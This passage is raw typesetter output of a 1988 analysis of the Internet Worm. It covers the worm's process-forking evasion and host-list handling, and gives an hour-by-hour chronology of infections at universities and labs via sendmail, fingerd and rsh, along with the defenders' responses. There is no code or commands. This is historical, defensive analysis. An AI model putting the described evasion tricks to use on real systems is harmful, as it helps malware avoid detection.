2665(However,)S
3087(the)S
3241(code)S
3461(is)S
3560(such)S
3775(that)S
3957(an)S
4083(uninitialized)S
4615(byte)S
4819(is)S
4918(the)S
4344 V
720(intended)S
1099(message.)S
1527(It)S
1623(is)S
1725(possible)S
2088(that)S
2274(the)S
2432(author)S
2723(eventually)S
3175(intended)S
3555(to)S
3669(run)S
3838(some)S
4085(monitoring)S
4566(program)S
4940(on)S
4464 V
720(ernie)S
960(\(after)S
1216(breaking)S
1606(into)S
1803(an)S
1938(account,)S
2314(perhaps\).)S
2753(Such)S
2994(a)S
3079(program)S
3458(could)S
3721(obtain)S
4012(the)S
4175(sending)S
4527(host)S
4735(number)S
4584 V
720(from)S
951(the)S
1110(single-byte)S
1591(message,)S
1991(whether)S
2349(it)S
2442(was)S
2634(sent)S
2832(as)S
2952(a)S
3033(TCP)S
3254(or)S
3375(UDP)S
3613(packet.)S
3966(However,)S
4394(no)S
4532(evidence)S
4924(for)S
4704 V
720(such)S
937(a)S
1015(program)S
1387(has)S
1553(been)S
1774(found)S
2040(and)S
2217(it)S
2306(is)S
2406(possible)S
2767(that)S
2950(the)S
3105(connection)S
3576(was)S
3764(simply)S
4070(a)S
4147(feint)S
4363(to)S
4474(cast)S
4662(suspicion)S
4824 V
720(on)S
850(personnel)S
1268(at)S
1370(Berkeley.)S
4980 V
970(The)S
1158(Worm)S
1446(would)S
1729(also)S
10 I
1923(fork)S
10 R
2117(itself)S
2350(on)S
2484(a)S
2562(regular)S
2878(basis)S
3112(and)S
10 I
3290(kill)S
10 R
3452(its)S
3581(parent.)S
3919(This)S
4131(has)S
4298(two)S
4482(e)S
4526 H
	(f)show 10 -.5 mul h (f)show
10 R
4587(ects.)S
4831(First,)S
5100 V
720(the)S
880(Worm)S
1173(appeared)S
1570(to)S
1686(keep)S
1912(changing)S
2316(its)S
2449(process)S
2786(identi\256er)S
3185(and)S
3367(no)S
3505(single)S
3781(process)S
4117(accumulated)S
4658(excessive)S
5220 V
720(amounts)S
1103(of)S
1230(cpu)S
1419(time.)S
1697(Secondly,)S
2139(processes)S
2566(that)S
2761(have)S
2994(been)S
3227(running)S
3583(for)S
3744(a)S
3833(long)S
4056(time)S
4279(have)S
4512(their)S
4740(priority)S
5340 V
720(downgraded)S
1260(by)S
1407(the)S
1576(scheduler.)S
2060(By)S
2224(forking,)S
2590(the)S
2759(new)S
2971(process)S
3316(would)S
3612(regain)S
3907(normal)S
4236(scheduling)S
4715(priority.)S
5460 V
720(This)S
945(mechanism)S
1447(did)S
1622(not)S
1797(always)S
2121(work)S
2373(correctly,)S
2799(either,)S
3098(as)S
3228(locally)S
3547(we)S
3710(observed)S
4117(some)S
4375(instances)S
4788(of)S
4918(the)S
5580 V
720(Worm)S
1005(with)S
1213(over)S
1420(600)S
1600(seconds)S
1946(of)S
2059(accumulated)S
2593(cpu)S
2767(time.)S
5736 V
970(If)S
1075(the)S
1236(Worm)S
1530(was)S
1724(present)S
2051(on)S
2190(a)S
2273(machine)S
2651(for)S
2807(more)S
3052(than)S
3264(12)S
3404(hours,)S
3691(it)S
3787(would)S
4077(\257ush)S
4312(its)S
4447(host)S
4654(list)S
4817(of)S
4940(all)S
5856 V
720(entries)S
1019(\257agged)S
1346(as)S
1462(being)S
1717(immune)S
2078(or)S
2194(already)S
2519(infected.)S
2927(The)S
3114(way)S
3312(hosts)S
3550(were)S
3775(added)S
4045(to)S
4155(this)S
4332(list)S
4487(implies)S
4814(that)S
4996(a)S
5976 V
720(single)S
989(Worm)S
1274(might)S
1538(reinfect)S
1872(the)S
2024(same)S
2259(machines)S
2666(every)S
2917(12)S
3047(hours.)S
6216 V
10 B
720(4.)S
855(Chronology)S
6372 V
10 R
970(What)S
1223(follows)S
1560(is)S
1664(an)S
1795(abbreviated)S
2297(chronology)S
2789(of)S
2909(events)S
3201(relating)S
3543(to)S
3658(the)S
3817(release)S
4131(of)S
4252(the)S
4412(Internet)S
4760(Worm.)S
6492 V
720(Most)S
960(of)S
1077(this)S
1256(information)S
1762(was)S
1950(gathered)S
2326(from)S
2553(personal)S
2924(mail,)S
3160(submissions)S
3683(to)S
3794(mailing)S
4133(lists,)S
4353(and)S
4530(Usenet)S
4840(post-)S
6612 V
720(ings.)S
982(Some)S
1250(items)S
1507(were)S
1740(taken)S
1996(from)S
2230([24])S
2436( and)S
2650([1],)S
2831( and)S
3045(are)S
3206(marked)S
3545(accordingly.)S
4111(This)S
4329(is)S
4437(certainly)S
4827(not)S
4996(a)S
6712 V
8 Y1
720(333333333333333333)S
6830 V
8 R
820(*)S
8 I
900(rexec)S
8 R
1095(is)S
1172(a)S
1231(remote)S
1475(command)S
1813(execution)S
2146(service.)S
2439(It)S
2512(requires)S
2792(that)S
2936(a)S
2996(username/password)S
3648(combination)S
4071(be)S
4171(supplied)S
4466(as)S
4557(part)S
6930 V
720(of)S
810(the)S
931(request.)S
7048 V
820(\262)S
900(This)S
1066(was)S
1214(compiled)S
1534(in)S
1620(as)S
1710(port)S
1862(number)S
2129(23357,)S
2373(on)S
2477(host)S
2634(127.0.0.1)S
2958(\(loopback\).)S
7166 V
820(\263)S
900(Using)S
1115(TCP)S
1287(port)S
1439(11357)S
1663(on)S
1767(host)S
1924(128.32.137.13.)S
2452(UDP)S
2637(is)S
2714(an)S
2813(Internet)S
3083(unreliable)S
3424(data)S
3580(packet)S
3811(transmission)S
4237(protocol.)S
7920 V
EP
%%Page: 11 12
BP
/slant 0 def
/height 1.000000 def
8 R
8 R
480 V
10 R
2767(- 11 -)S
840 V
720(complete)S
1129(chronology\320many)S
1949(other)S
2197(sites)S
2418(were)S
2654(a)S
2698 H
	(f)show 10 -.5 mul h (f)show
10 R
2759(ected)S
3012(by)S
3155(the)S
3320(Worm)S
3618(but)S
3789(are)S
3953(not)S
4124(listed)S
4384(here.)S
4653(Note)S
4890(that)S
960 V
720(because)S
1066(of)S
1180(clock)S
1427(drift)S
1630(and)S
1804(machine)S
2172(crashes,)S
2520(some)S
2761(of)S
2874(the)S
3026(times)S
3273(given)S
3525(here)S
3726(may)S
3928(not)S
4086(be)S
4210(completely)S
4684(accurate.)S
1080 V
720(They)S
955(should)S
1252(convey)S
1570(an)S
1694(approximation)S
2308(to)S
2417(the)S
2570(sequence)S
2966(of)S
3080(events,)S
3391(however.)S
3820(All)S
3979(times)S
4227(are)S
4379(given)S
4632(in)S
4741(Eastern)S
1200 V
720(Standard)S
1105(Time.)S
1356 V
970(It)S
1079(is)S
1194(particularly)S
1702(interesting)S
2172(to)S
2298(note)S
2518(how)S
2738(quickly)S
3086(and)S
3278(how)S
3498(widely)S
3818(the)S
3988(Worm)S
4291(spread.)S
4654(It)S
4763(is)S
4879(also)S
1476 V
720(signi\256cant)S
1170(to)S
1281(note)S
1486(how)S
1690(quickly)S
2022(it)S
2110(was)S
2297(identi\256ed)S
2707(and)S
2883(stopped)S
3226(by)S
3358(an)S
3484(ad)S
3610(hoc)S
3786(collection)S
4212(of)S
4327(``Worm)S
4680(hunters'')S
1596 V
720(using)S
967(the)S
1119(same)S
1354(network)S
1711(to)S
1819(communicate)S
2387(their)S
2600(results.)S
1836 V
10 B
720(November)S
1193(2,)S
1298(1988)S
2016 V
10 R
720(~1700)S
1260(Worm)S
1547(executed)S
1934(on)S
2067(a)S
2144(machine)S
2515(at)S
2620(Cornell)S
2953(University.)S
3433(\(NCSC\))S
3794(Whether)S
4170(this)S
4348(was)S
4536(a)S
4613(last)S
4785(test)S
4957(or)S
2136 V
1260(the)S
1412(initial)S
1676(execution)S
2094(is)S
2191(not)S
2349(known.)S
2256 V
720(~1800)S
1260(Machine)S
10 I
1645(prep.ai.mit.edu)S
10 R
2289(at)S
2397(MIT)S
2617(infected.)S
3000(\(Seely,)S
3317(mail\))S
3565(This)S
3780(may)S
3989(have)S
4214(been)S
4439(the)S
4598(initial)S
4869(exe-)S
2376 V
1260(cution.)S
1605(Prep)S
1828(is)S
1935(a)S
2019(public-access)S
2596(machine,)S
2998(used)S
3220(for)S
3375(storage)S
3702(and)S
3885(distribution)S
4386(of)S
4508(GNU)S
4763(project)S
2496 V
1260(software.)S
1693(It)S
1789(is)S
1891(con\256gured)S
2353(with)S
2566(some)S
2812(notorious)S
3225(security)S
3576(holes)S
3822(that)S
4008(allow)S
4266(anonymous)S
4763(remote)S
2616 V
1260(users)S
1495(to)S
1603(introduce)S
2010(\256les)S
2207(into)S
2393(the)S
2545(system.)S
2736 V
774(1830)S
1260(Infected)S
1626(machine)S
2004(at)S
2116(the)S
2278(University)S
2740(of)S
2863(Pittsburgh)S
3315(infects)S
3621(a)S
3705(machine)S
4083(at)S
4195(the)S
4357(RAND)S
4680(Corpora-)S
2856 V
1260(tion.)S
1471(\(NCSC\))S
2976 V
774(2100)S
1260(Worm)S
1545(discovered)S
2007(on)S
2137(machines)S
2544(at)S
2646(Stanford.)S
3045(\(NCSC\))S
3096 V
774(2130)S
1260(First)S
1474(machine)S
1842(at)S
1944(the)S
2096(University)S
2548(of)S
2661(Minnesota)S
3113(invaded.)S
3484(\(mail\))S
3216 V
774(2204)S
1260(Gateway)S
1666(machine)S
2056(at)S
2180(University)S
2654(of)S
2789(California,)S
3271(Berkeley)S
3683(invaded.)S
4106(Mike)S
4369(Karels)S
4681(and)S
4878(Phil)S
3336 V
1260(Lapsley)S
1635(discover)S
2032(this)S
2236(shortly)S
2573(afterwards)S
3052(because)S
3426(they)S
3657(noticed)S
4009(an)S
4161(unusual)S
4530(load)S
4760(on)S
4918(the)S
3456 V
1260(machine.)S
1653(\(mail\))S
3576 V
774(2234)S
1260(Gateway)S
1644(machine)S
2012(at)S
2114(Princeton)S
2527(University)S
2979(infected.)S
3355(\(mail\))S
3696 V
720(~2240)S
1260(Machines)S
1700(at)S
1824(the)S
1998(University)S
2472(of)S
2607(North)S
2892(Carolina)S
3288(are)S
3461(infected)S
3835(and)S
4032(attempt)S
4385(to)S
4516(invade)S
4835(other)S
3816 V
1260(machines.)S
1739(Attempts)S
2153(on)S
2300(machines)S
2724(at)S
2843(MCNC)S
3185(\(Microelectronics)S
3941(Center)S
4254(of)S
4384(North)S
4663(Carolina\))S
3936 V
1260(start)S
1462(at)S
1564(2240.)S
1819(\(mail\))S
4056 V
774(2248)S
1260(Machines)S
1678(at)S
1780(SRI)S
1966(infected)S
2317(via)S
2469(sendmail.)S
2885(\(mail\))S
4176 V
774(2252)S
1260(Worm)S
1545(attempts)S
1914(to)S
2022(invade)S
2318(machine)S
2686(andrew.cmu.edu)S
3375(at)S
3477(Carnegie-Mellon)S
4189(University.)S
4696(\(mail\))S
4296 V
774(2254)S
1260(Gateway)S
1652(hosts)S
1896(at)S
2006(the)S
2167(University)S
2628(of)S
2750(Maryland)S
3177(come)S
3432(under)S
3698(attack)S
3975(via)S
4136(\256ngerd)S
4458(daemon.)S
4868(Evi-)S
4416 V
1260(dence)S
1522(is)S
1619(later)S
1826(found)S
2089(that)S
2269(other)S
2504(local)S
2728(hosts)S
2964(are)S
3115(already)S
3438(infected.)S
3844(\(mail\))S
4536 V
774(2259)S
1260(Machines)S
1685(at)S
1794(University)S
2253(of)S
2373(Pennsylvania)S
2943(attacked,)S
3337(but)S
3503(none)S
3735(are)S
3894(susceptible.)S
4431(Logs)S
4669(will)S
4863(later)S
4656 V
1260(show)S
1501(210)S
1681(attempts)S
2050(over)S
2257(next)S
2459(12)S
2589(hours.)S
2866(\(mail\))S
4776 V
720(~2300)S
1260(AI)S
1395(Lab)S
1580(machines)S
1987(at)S
2089(MIT)S
2302(infected.)S
2678(\(NCSC\))S
4896 V
774(2328)S
1260(mimsy.umd.edu)S
1935(at)S
2037(University)S
2489(of)S
2602(Maryland)S
3020(is)S
3117(infected)S
3468(via)S
3620(sendmail.)S
4036(\(mail\))S
5016 V
774(2340)S
1260(Researchers)S
1777(at)S
1885(Berkeley)S
2282(discover)S
2657(sendmail)S
3055(and)S
3236(rsh)S
3395(as)S
3515(means)S
3807(of)S
3927(attack.)S
4257(They)S
4499(begin)S
4758(to)S
4873(shut)S
5136 V
1260(o)S
1310 H
	(f)show 10 -.5 mul h (f)show
10 R
1401(other)S
1636(network)S
1993(services)S
2344(as)S
2457(a)S
2531(precaution.)S
3007(\(Seeley\))S
5256 V
774(2345)S
1260(Machines)S
1682(at)S
1788(Dartmouth)S
2255(and)S
2433(the)S
2589(Army)S
2856(Ballistics)S
3263(Research)S
3662(Lab)S
3852(\(BRL\))S
4148(attacked)S
4515(and)S
4694(infected.)S
5376 V
1260(\(mail,)S
1526(NCSC\))S
5496 V
774(2349)S
1260(Gateway)S
1645(machine)S
2014(at)S
2117(the)S
2270(University)S
2723(of)S
2838(Utah)S
3064(infected.)S
3472(In)S
3587(the)S
3741(next)S
3945(hour,)S
4185(the)S
4339(load)S
4543(average)S
4884(will)S
5616 V
1260(soar)S
1456(to)S
1564(100)S
5566 V
7 R
1714(*)S
5616 V
10 R
1779(because)S
2124(of)S
2237(repeated)S
2604(infections.)S
3053(\(Seeley\))S
5916 V
10 B
720(November)S
1193(3,)S
1298(1988)S
6096 V
10 R
774(0007)S
1260(University)S
1712(of)S
1825(Arizona)S
2176(machine)S
2544(arizona.edu)S
3036(infected.)S
3412(\(mail\))S
6216 V
774(0021)S
1260(Princeton)S
1685(University)S
2149(main)S
2391(machine)S
2771(\(a)S
2890(V)S
8 R
2962(AX)S
10 R
3120(8650\))S
3395(infected.)S
3813(Load)S
4060(average)S
4412(reaches)S
4753(68)S
4896(and)S
6336 V
1260(the)S
1412(machine)S
1780(crashes.)S
2128(\(mail\))S
6456 V
774(0033)S
1260(Machine)S
1639(dewey.udel.edu)S
2295(at)S
2397(the)S
2549(University)S
3001(of)S
3114(Delaware)S
3525(infected,)S
3901(but)S
4059(not)S
4217(by)S
4347(sendmail.)S
4763(\(mail\))S
6576 V
774(0105)S
1260(Worm)S
1545(invades)S
1880(machines)S
2287(at)S
2389(Lawrence)S
2811(Livermore)S
3262(Labs)S
3486(\(LLL\).)S
3790(\(NCSC\))S
6696 V
774(0130)S
1260(Machines)S
1678(at)S
1780(UCLA)S
2082(infected.)S
2458(\(mail\))S
6862 V
8 Y1
720(333333333333333333)S
6980 V
8 R
820(*)S
900(The)S
1052(load)S
1217(average)S
1491(is)S
1573(an)S
1677(indication)S
2024(of)S
2119(how)S
2286(many)S
2492(processes)S
2825(are)S
2950(on)S
3059(the)S
3185(ready)S
3390(list)S
3516(awaiting)S
3819(their)S
3993(turn)S
4150(to)S
4241(execute.)S
4556(The)S
7080 V
720(normal)S
969(load)S
1130(for)S
1246(a)S
1305(gateway)S
1594(machine)S
1887(is)S
1964(usually)S
2218(below)S
2437(10)S
2541(during)S
2773(o)S
2813 H
	(f)show 8 -.5 mul h (f)show
8 R
2862(-hours.)S
7920 V
EP
%%Page: 12 13
BP
/slant 0 def
/height 1.000000 def
8 R
8 R
480 V
10 R
2767(- 12 -)S
840 V
774(0200)S
1260(The)S
1445(Worm)S
1730(is)S
1827(detected)S
2189(on)S
2319(machines)S
2726(at)S
2828(Harvard)S
3184(University.)S
3661(\(NCSC\))S
960 V
774(0238)S
1260(Peter)S
1501(Yee)S
1697(at)S
1805(Berkeley)S
2201(posts)S
2444(a)S
2525(message)S
2900(to)S
3015(the)S
3174(TCP-IP)S
3517(mailing)S
3860(list:)S
4048(``We)S
4289(are)S
4447(under)S
4711(attack.'')S
1080 V
1260(A)S
1332 H
	(f)show 10 -.5 mul h (f)show
10 R
1393(ected)S
1650(sites)S
1875(mentioned)S
2344(in)S
2469(the)S
2638(posting)S
2980(include)S
3321(U.)S
3465(C.)S
3604(Berkeley,)S
4036(U.)S
4180(C.)S
4319(San)S
4516(Diego,)S
4832(LLL,)S
1200 V
1260(Stanford,)S
1659(and)S
1833(NASA)S
2135(Ames.)S
2423(\(mail\))S
1320 V
720(~0315)S
1260(Machines)S
1679(at)S
1782(the)S
1935(University)S
2388(of)S
2502(Chicago)S
2866(are)S
3018(infected.)S
3425(One)S
3622(machine)S
3991(in)S
4100(the)S
4253(Physics)S
4591(department)S
1440 V
1260(logs)S
1458(over)S
1666(225)S
1847(infection)S
2233(attempts)S
2603(via)S
2756(\256ngerd)S
3070(from)S
3295(machines)S
3702(at)S
3804(Cornell)S
4134(during)S
4425(the)S
4577(time)S
4785(period)S
1560 V
1260(midnight)S
1652(to)S
1760(0730.)S
2015(\(mail\))S
1680 V
774(0334)S
1260(Warning)S
1656(about)S
1925(the)S
2094(Worm)S
2396(is)S
2510(posted)S
2818(anonymously)S
3404(\(from)S
3678(``foo@bar.arpa''\))S
4438(to)S
4564(the)S
4734(TCP-IP)S
1800 V
1260(mailing)S
1609(list:)S
1803(``There)S
2143(may)S
2357(be)S
2493(a)S
2579(virus)S
2821(loose)S
3074(on)S
3216(the)S
3380(internet.'')S
3848(What)S
4106(follows)S
4448(are)S
4611(three)S
4852(brief)S
1920 V
1260(statements)S
1714(of)S
1829(how)S
2033(to)S
2143(stop)S
2342(the)S
2496(Worm,)S
2808(followed)S
3195(by)S
3328(``Hope)S
3643(this)S
3821(helps,)S
4090(but)S
4251(more,)S
4514(I)S
4580(hope)S
4807(it)S
4896(is)S
4996(a)S
2040 V
1260(hoax.'')S
1605(The)S
1790(poster)S
2064(is)S
2161(later)S
2368(revealed)S
2735(to)S
2843(be)S
2967(Andy)S
3219(Sudduth)S
3583(of)S
3696(Harvard,)S
4077(who)S
4279(was)S
4464(phoned)S
4788(by)S
4918(the)S
2160 V
1260(Worm's)S
1622(alleged)S
1945(author,)S
2260(Robert)S
2567(T.)S
2688(Morris.)S
3050(Due)S
3252(to)S
3366(network)S
3729(and)S
3909(machine)S
4283(loads,)S
4555(the)S
4713(warning)S
2280 V
1260(is)S
1357(not)S
1515(propagated)S
1988(for)S
2134(well)S
2336(over)S
2543(24)S
2673(hours.)S
2980(\(mail,)S
3246(Seeley\))S
2400 V
720(~0400)S
1260(Colorado)S
1662(State)S
1892(University)S
2344(attacked.)S
2731(\(mail\))S
2520 V
720(~0400)S
1260(Machines)S
1678(at)S
1780(Purdue)S
2093(University)S
2545(infected.)S
2640 V
774(0554)S
1260(Keith)S
1522(Bostic)S
1818(mails)S
2075(out)S
2243(a)S
2327(warning)S
2694(about)S
2956(the)S
3118(Worm,)S
3439(plus)S
3647(a)S
3732(patch)S
3989(to)S
4108(sendmail.)S
4565(His)S
4745(posting)S
2760 V
1260(goes)S
1479(to)S
1593(the)S
1751(TCP-IP)S
2093(list,)S
2277(the)S
2435(Usenix)S
2754(4bsd-ucb-\256xes)S
3378(newsgroup,)S
3876(and)S
4055(selected)S
4411(site)S
4585(administra-)S
2880 V
1260(tors)S
1440(around)S
1747(the)S
1899(country.)S
2259(\(mail,)S
2525(Seeley\))S
3000 V
774(0645)S
1260(Cli)S
1383 H
	(f)show 10 -.5 mul h (f)show
10 R
1444(ord)S
1614(Stoll)S
1841(calls)S
2061(the)S
2220(National)S
2601(Computer)S
3038(Security)S
3408(Center)S
3711(and)S
3892(informs)S
4241(them)S
4479(of)S
4600(the)S
4760(Worm.)S
3120 V
1260(\(NCSC\))S
3240 V
720(~0700)S
1260(Machines)S
1689(at)S
1802(Georgia)S
2164(Institute)S
2533(of)S
2657(Technology)S
3175(are)S
3337(infected.)S
3754(Gateway)S
4150(machine)S
4530(\(a)S
4649(Vax)S
4857(780\))S
3360 V
1260(load)S
1462(average)S
1801(begins)S
2092(climb)S
2350(past)S
2541(30.)S
2696(\(mail\))S
3480 V
774(0730)S
1260(I)S
1324(discover)S
1693(infection)S
2079(on)S
2210(machines)S
2618(at)S
2721(Purdue)S
3035(University.)S
3543(Machines)S
3962(are)S
4114(so)S
4234(overloaded)S
4709(I)S
4774(cannot)S
3600 V
1260(read)S
1465(my)S
1626(mail)S
1837(or)S
1953(news,)S
2216(including)S
2627(mail)S
2838(from)S
3065(Keith)S
3320(Bostic)S
3609(about)S
3864(the)S
4019(Worm.)S
4362(Believing)S
4784(this)S
4962(to)S
3720 V
1260(be)S
1386(related)S
1689(to)S
1800(a)S
1877(recurring)S
2275(hardware)S
2678(problem)S
3044(on)S
3177(the)S
3332(machine,)S
3728(I)S
3794(request)S
4115(that)S
4298(the)S
4453(system)S
4764(be)S
4891(res-)S
3840 V
1260(tarted.)S
3960 V
774(0807)S
1260(Edward)S
1606(Wang)S
1880(at)S
1988(Berkeley)S
2384(unravels)S
2758(\256ngerd)S
3077(attack,)S
3376(but)S
3541(his)S
3695(mail)S
3910(to)S
4025(the)S
4184(systems)S
4538(group)S
4808(is)S
4912(not)S
4080 V
1260(read)S
1461(for)S
1607(more)S
1842(than)S
2044(12)S
2174(hours.)S
2451(\(mail\))S
4200 V
774(0818)S
1260(I)S
1335(read)S
1548(Keith's)S
1884(mail.)S
2159(I)S
2234(forward)S
2591(his)S
2750(warning)S
3120(to)S
3241(the)S
3406(Usenet)S
10 I
3726(news.announce.important)S
10 R
4802(news-)S
4320 V
1260(group,)S
1554(to)S
1668(the)S
1826(nntp-managers)S
2455(mailing)S
2797(list,)S
2980(and)S
3159(to)S
3272(over)S
3484(30)S
3619(other)S
3859(site)S
4033(admins.)S
4412(This)S
4625(is)S
4727(the)S
4884(\256rst)S
4440 V
1260(notice)S
1540(most)S
1771(of)S
1890(these)S
2131(people)S
2433(get)S
2591(about)S
2849(the)S
3007(Worm.)S
3353(This)S
3567(group)S
3836(exchanges)S
4287(mail)S
4501(all)S
4637(day)S
4818(about)S
4560 V
1260(progress)S
1631(and)S
1808(behavior)S
2190(of)S
2306(the)S
2461(Worm,)S
2774(and)S
2951(eventually)S
3400(becomes)S
3782(the)S
10 I
3937(phage)S
10 R
4214(mailing)S
4553(list)S
4709(based)S
4968(at)S
4680 V
1260(Purdue)S
1573(with)S
1781(over)S
1988(300)S
2168(recipients.)S
4800 V
720(~0900)S
1260(Machines)S
1678(on)S
1808(Nysernet)S
2198(found)S
2461(to)S
2569(be)S
2693(infected.)S
3069(\(mail\))S
4920 V
774(1036)S
1260(I)S
1328(mail)S
1542(\256rst)S
1734(description)S
2214(of)S
2333(how)S
2541(the)S
2699(Worm)S
2990(works)S
3270(to)S
3384(the)S
3542(mailing)S
3884(list)S
4043(and)S
4223(to)S
4337(the)S
4495(Risks)S
4754(Digest.)S
5040 V
1260(The)S
1445(\256ngerd)S
1758(attack)S
2026(is)S
2123(not)S
2281(yet)S
2433(known.)S
5160 V
774(1130)S
1260(The)S
1447(Defense)S
1805(Communications)S
2521(Agency)S
2863(inhibits)S
3196(the)S
3350(mailbridges)S
3854(between)S
4218(Arpanet)S
4571(and)S
4748(Milnet.)S
5280 V
1260(\(NCSC\))S
5400 V
774(1200)S
1260(Over)S
1490(120)S
1671(machines)S
2079(at)S
2182(SRI)S
2370(in)S
2480(the)S
2634(Science)S
2976(&)S
3086(Technology)S
3595(center)S
3870(are)S
4023(shut)S
4222(down.)S
4531(Between)S
4912(1/3)S
5520 V
1260(and)S
1434(1/2)S
1592(are)S
1743(found)S
2006(to)S
2114(be)S
2238(infected.)S
2614(\(mail\))S
5640 V
774(1450)S
1260(Personnel)S
1686(at)S
1790(Purdue)S
2105(discover)S
2475(machines)S
2884(with)S
3094(patched)S
3436(versions)S
3801(of)S
3916(sendmail)S
4310(reinfected.)S
4796(I)S
4862(mail)S
5760 V
1260(and)S
1450(post)S
1663(warning)S
2036(that)S
2232(the)S
2400(sendmail)S
2807(patch)S
3069(by)S
3215(itself)S
3460(is)S
3572(not)S
3745(su)S
3834 H
	(f)show 10 -.5 mul h (\256)show
10 R
3918(cient)S
4157(protection.)S
4662(This)S
4885(was)S
5880 V
1260(known)S
1568(at)S
1676(various)S
2006(sites,)S
2245(including)S
2659(Berkeley)S
3055(and)S
3235(MIT,)S
3479(over)S
3692(12)S
3828(hours)S
4087(earlier)S
4378(but)S
4543(never)S
4801(publi-)S
6000 V
1260(cized.)S
6120 V
774(1600)S
1260(System)S
1592(admins)S
1918(of)S
2038(Purdue)S
2358(systems)S
2712(meet)S
2943(to)S
3058(discuss)S
3384(local)S
3615(strategy.)S
4023(Captured)S
4426(versions)S
4797(of)S
4918(the)S
6240 V
1260(Worm)S
1548(suggest)S
1881(a)S
1958(way)S
2157(to)S
2268(prevent)S
2600(infection:)S
3016(create)S
3286(a)S
3363(directory)S
3756(named)S
10 I
4055(sh)S
10 R
4177(in)S
4288(the)S
4442(/usr/tmp)S
4808(direc-)S
6360 V
1260(tory.)S
6480 V
774(1800)S
1260(Mike)S
1516(Spitzer)S
1844(and)S
2033(Mike)S
2290(Rowan)S
2619(of)S
2748(Purdue)S
3077(discover)S
3461(how)S
3679(the)S
3847(\256nger)S
4126(bug)S
4322(works.)S
4667(A)S
4785(mailer)S
6600 V
1260(error)S
1483(causes)S
1773(their)S
1986(explanation)S
2482(to)S
2590(fail)S
2753(to)S
2861(leave)S
3101(Purdue)S
3414(machines.)S
6720 V
774(1900)S
1260(Bill)S
1441(Sommer\256eld)S
1988(of)S
2101(MIT)S
2314(recreates)S
2697(\256ngerd)S
3010(attack)S
3278(and)S
3453(phones)S
3767(Berkeley)S
4158(with)S
4367(this)S
4543(information.)S
6840 V
1260(Nothing)S
1618(is)S
1715(mailed)S
2017(or)S
2130(posted)S
2421(about)S
2673(this)S
2848(avenue)S
3160(of)S
3273(attack.)S
3566(\(mail,)S
3832(Seeley\))S
6960 V
774(1919)S
1260(Keith)S
1519(Bostic)S
1812(posts)S
2055(and)S
2236(mails)S
2490(new)S
2693(patches)S
3029(for)S
3183(sendmail)S
3582(and)S
3764(\256ngerd.)S
4140(They)S
4383(are)S
4542(corrupted)S
4962(in)S
7080 V
1260(transit.)S
1595(Many)S
1858(sites)S
2066(do)S
2196(not)S
2354(receive)S
2671(them)S
2901(until)S
3115(the)S
3267(next)S
3469(day.)S
3698(\(mail,)S
3964(Seeley\))S
7920 V
EP
%%Page: 13 14
BP
/slant 0 def
/height 1.000000 def
10 R
10 R
480 V
2767(- 13 -)S
840 V
774(1937)S
1260(Tim)S
1460(Becker)S
1775(of)S
1892(the)S
2048(University)S
2504(of)S
2621(Rochester)S
3054(mails)S
3305(out)S
3467(description)S
3945(of)S
4062(the)S
4218(\256ngerd)S
4535(attack.)S
4862(This)S
960 V
1260(one)S
1434(reaches)S
1762(the)S
10 I
1914(phage)S
10 R
2188(mailing)S
2524(list.)S
2702(\(mail\))S
1080 V
774(2100)S
1260(My)S
1433(original)S
1778(mail)S
1990(about)S
2246(the)S
2402(Worm,)S
2716(sent)S
2911(at)S
3017(0818,)S
3276(\256nally)S
3566(reaches)S
3898(the)S
4054(University)S
4510(of)S
4627(Maryland.)S
1200 V
1260(\(mail\))S
1320 V
774(2120)S
1260(Personnel)S
1698(at)S
1814(Purdue)S
2141(verify,)S
2448(after)S
2674(repeated)S
3055(attempts,)S
3463(that)S
3657(creating)S
4023(a)S
4112(directory)S
4517(named)S
10 I
4828(sh)S
10 R
4962(in)S
1440 V
1260(/usr/tmp)S
1624(prevents)S
1992(infection.)S
2432(I)S
2495(post)S
2692(this)S
2867(information)S
3369(to)S
10 I
3477(phage.)S
1560 V
10 R
774(2130)S
1260(Group)S
1545(at)S
1647(Berkeley)S
2037(begins)S
2328(decompiling)S
2858(Worm)S
3143(into)S
3329(C)S
3426(code.)S
3669(\(Seeley\))S
1860 V
10 B
720(November)S
1193(4,)S
1298(1988)S
2040 V
10 R
720(0050)S
1260(Bill)S
1460(Sommer\256eld)S
2026(mails)S
2292(out)S
2469(description)S
2962(of)S
3095(\256ngerd)S
3428(attack.)S
3741(He)S
3907(also)S
4118(makes)S
4423(\256rst)S
4629(comments)S
2160 V
1260(about)S
1512(the)S
1664(coding)S
1966(style)S
2185(of)S
2298(the)S
2450(Worm's)S
2807(author.)S
3117(\(mail\))S
2280 V
720(0500)S
1260(MIT)S
1473(group)S
1736(\256nishes)S
2072(code)S
2290(decompilation.)S
2917(\(mail,)S
3183(NCSC\))S
2400 V
720(0900)S
1260(Berkeley)S
1650(group)S
1913(\256nishes)S
2249(code)S
2467(decompilation.)S
3094(\(mail,)S
3360(NCSC,)S
3677(Seeley\))S
2520 V
720(1100)S
1260(Milnet-Arpanet)S
1911(mailbridges)S
2413(restored.)S
2789(\(NCSC\))S
2640 V
720(1420)S
1260(Keith)S
1512(Bostic)S
1798(reposts)S
2111(\256x)S
2247(to)S
2355(\256ngerd.)S
2693(\(mail\))S
2760 V
720(1536)S
1260(Ted)S
1445(Ts'o)S
1658(of)S
1771(MIT)S
1984(posts)S
2220(clari\256cation)S
2727(of)S
2840(how)S
3042(Worm)S
3327(operates.)S
3714(\(mail\))S
2880 V
720(1720)S
1260(Keith)S
1512(Bostic)S
1798(posts)S
2034(\256nal)S
2242(set)S
2383(of)S
2496(patches)S
2825(for)S
2971(sendmail)S
3362(and)S
3537(\256ngerd.)S
3906(Included)S
4286(is)S
4384(humorous)S
4815(set)S
4957(of)S
3000 V
1260(\256xes)S
1479(to)S
1587(bugs)S
1806(in)S
1914(the)S
2066(decompiled)S
2562(Worm)S
2847(source)S
3137(code.)S
3380(\(mail\))S
3120 V
720(2130)S
1260(John)S
1503(Markho)S
1819 H
	(f)show 10 -.5 mul h (f)show
10 R
1935(of)S
2073(the)S
2250(New)S
2493(York)S
2753(Times)S
3058(tells)S
3280(me)S
3457(in)S
3590(a)S
3689(phone)S
3988(conversation)S
4553(that)S
4758(he)S
4907(has)S
3240 V
1260(identi\256ed)S
1679(the)S
1842(author)S
2138(of)S
2262(the)S
2425(Worm)S
2720(and)S
2904(con\256rmed)S
3349(it)S
3445(with)S
3663(at)S
3775(least)S
3998(two)S
4188(independent)S
4716(sources.)S
3360 V
1260(The)S
1451(next)S
1659(morning's)S
2106(paper)S
2363(will)S
2556(identify)S
2904(the)S
3063(author)S
3355(as)S
